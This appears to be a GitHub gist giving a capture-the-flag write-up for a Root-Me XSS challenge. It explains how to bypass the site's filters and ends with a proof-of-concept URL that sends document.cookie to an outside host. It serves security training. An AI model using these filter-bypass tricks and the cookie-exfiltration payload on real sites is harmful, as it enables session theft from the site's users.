@myuyu
Last active May 6, 2021 00:21

I noticed that the color parameter can contain any characters, which is useful for breaking out of the color=" variable assignment, but the reflection is limited to only the first 3 characters.

And because the value of the nickname parameter is reflected right after color, we can benefit from that by turning everything after color into a comment until we reach the value of the nickname parameter: color="/*&nickname=*/

Then we can use , to add our malicious code with window.location, but the application converts the word location to ( ͡° ͜ʖ ͡°). There is a way to bypass that by using a unicode escape for one specific character in the word location, which JavaScript itself converts back to the original form (because (), %60 and some other characters are blocked, location is the better choice).

Unfortunately, double quotes, single quotes and %60 are blocked by the application, so we cannot use them to assign our host as a value to location. Fortunately, in JavaScript /Anything/ is treated as "/anything/" (a regex literal that is coerced to a string when it is concatenated), so we assign our host to location through /\0u.ma?cookie/+document.cookie

PoC: http://challenge01.root-me.org/web-client/ch24/?nickname=*/},locati\u006fn=/\google.com?a=/%2bdocument.cookie,{//&color=%22/*&p=game&win=x

@j4k0m commented May 5, 2021

[animated gif]
